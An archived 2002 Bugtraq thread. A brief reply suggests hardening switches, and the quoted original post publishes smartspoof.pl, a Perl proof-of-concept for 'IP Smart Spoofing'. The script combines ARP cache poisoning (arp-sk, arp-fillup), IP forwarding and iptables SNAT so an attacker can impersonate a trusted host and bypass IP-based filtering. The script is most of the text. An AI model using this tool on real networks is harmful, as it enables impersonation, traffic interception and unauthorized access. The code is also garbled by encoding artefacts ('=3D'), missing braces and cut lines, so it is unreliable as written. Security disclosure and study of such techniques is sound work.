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RE: Exploit code for IP Smart Spoofing

From: "Stephen Gill" <gillsr () yahoo com>
Date: Wed, 13 Nov 2002 13:32:56 -0600

In order to mitigate this on edge switches it may behoove the network
administrator to review his or her security policy and adhere to
stricter guidelines.  The following document suggests one method for
protecting Cisco switches along with additional guidelines for secure
configuration in a template format.


Comments or suggestions welcome.
-- steve

-----Original Message-----
From: Laurent Licour [mailto:llicour () althes fr] 
Sent: Tuesday, November 12, 2002 6:21 AM
To: 'bugtraq () securityfocus com'
Subject: Exploit code for IP Smart Spoofing


As we reported in our previous article: IP Smartspoofing
(http://www.althes.fr/ressources/avis/smartspoofing.htm), we introduced
new method for IP Spoofing, allowing full-connexion from any client

The exploit code smartspoof.pl is a proof of concept (for educational
purpose only) of the Smart Spoofing method

The additional software "arp-fillup" is necessary to achieve this:

These tools are also available on

Exploit Code (perl source) :

#!/usr/bin/perl -w
# smartspoof.pl
# This script is provided as proof of concept for educational purpose
# Laurent Licour 28/10/02
# llicour () althes fr
# Althes (http://www.althes.fr)
# Start/Stop smartspoofing
# http://www.althes.fr/ressources/avis/smartspoofing.htm
# Require linux 2.4 (tested on Redhat 7.3)
# Require NetAddr::IP perl package (www.cpan.org)
# Require arp-sk tool (www.arp-sk.org)
# Require arp-fillup tool
# Require iptables (www.iptables.org)

use strict;
use Getopt::Long;
use NetAddr::IP;

sub get_ip_next_hop
  my ($ip0, $int) =3D @_;
  my $ip=3Dnew NetAddr::IP $ip0;
  open(ROUTE, "route -n |");
  my $gateway=3D"";
  my $masklen; my @fields; my $line; my $entry;
  while($line =3D <ROUTE>)
    @fields =3D split / +/, $line;
    $entry=3Dnew NetAddr::IP($fields[0] . "/" . $fields[2]);
    if ($entry->contains($ip))
      if (($gateway eq "") or ($masklen < $entry->masklen()))
        $gateway =3D $fields[1];
        $masklen =3D $entry->masklen();
        $$int =3D $fields[7];
        chop $$int;
  die "Error : No route for $ip \n" if ($gateway eq "");
  $gateway=3D$ip->addr() if ($gateway eq "");


sub get_mac
  my $ip=3Dshift;
  my $cmd=3D"ping -c 1 -w 1 $ip >/dev/null 2>&1";
  $cmd=3D"cat /proc/net/arp | grep $ip' ' | awk '{print \$4}'";
  my $mac=3D`$cmd`;

sub usage
  print "Start/Stop de smartspoofing\n\n";
  print "This is the proof of concept of the smartspoofing technique\n";
  print "(visit
  print "\n";
  print "You only have to specify :\n";
  print " -D : address of the filtering equipement to connect to\n";
  print " -S : address of the trusted host to spoof\n";
  print "\n";
  print "Then, you only need to launch your favorite client software
this host\n";
  print "or any host behind this (because it is now a router)\n";
  print "\n";
  print "This script is provided as proof of concept for educational
  print "\n";

  exit 0;

my $syntax =3D "syntax: $0 [-i eth0] [-h] [-v] -D <\@IP destination> -S
source> -start|-stop\n";

my $ver =3D "smartspoof.pl v1.0 28/10/02\n";

my ($ipsrc, $ipdst);
my ($start, $stop);
my $interface =3D "";
my ($version, $help);

           "D=3Ds" =3D> \$ipdst,
           "S=3Ds" =3D> \$ipsrc,
           "i=3Ds" =3D> \$interface,
           "v" =3D> \$version,
           "h" =3D> \$help,
           "start" =3D> \$start,
           "stop" =3D> \$stop
          ) or die $syntax;

usage if $help;
die $ver if $version;
die $syntax unless @ARGV =3D=3D 0;
die $syntax unless defined($ipsrc) and defined($ipdst);
die $syntax unless defined($start) or defined($stop);
die $syntax if $start and $stop;

my $cmd;

my ($intsrc, $intdst);
my $ipsrc_next_hop =3D get_ip_next_hop($ipsrc, \$intsrc);
my $ipdst_next_hop =3D get_ip_next_hop($ipdst, \$intdst);
$interface=3D$intdst if ($interface eq "");

if ($start)
  print "Activate IP Forwarding\n";
  system("echo 1 > /proc/sys/net/ipv4/ip_forward");

  print "Activate Arp fillup on $ipsrc\n";
  system("arp-fillup -i $interface -D $ipsrc >/dev/null 2>&1 &");

  print "Set NAT rule on iptables\n";
  $cmd=3D"iptables -t nat -A POSTROUTING -o $interface -d $ipdst -j SNAT

  print "Desactivate ICMP Redirect\n";
  system("iptables -A OUTPUT -p icmp --icmp-type host-redirect -j

  print "Activate Arp cache poisoning of $ipsrc_next_hop entry on
$ipdst_next_hop on $interface\n";
  $cmd=3D"arp-sk -w -i $interface -d $ipdst_next_hop -S $ipsrc_next_hop
$ipdst_next_hop -c 1 >/dev/null 2>&1";
  $cmd=3D"arp-sk -r -i $interface -d $ipdst_next_hop -S $ipsrc_next_hop
$ipdst_next_hop >/dev/null 2>&1 &";
elsif ($stop)
  print "Suppress Arp fillup on $ipsrc\n";
  system("killall arp-fillup");

  print "Suppress Arp cache poisoning of $ipsrc_next_hop entry on
  system("killall arp-sk");
  my $mac=3Dget_mac($ipsrc_next_hop);
  $cmd=3D"arp-sk -r -c 1 -i $interface -d $ipdst_next_hop -S
$ipsrc_next_hop:$mac -D $ipdst_next_hop >/dev/null 2>&1";

  print "Clear iptables rules\n";
  system("service iptables stop");
  system("service iptables start");

  print "Desactivate ip forwarding\n";
  system("echo 0 > /proc/sys/net/ipv4/ip_forward");


Laurent Licour
mailto:llicour () althes fr


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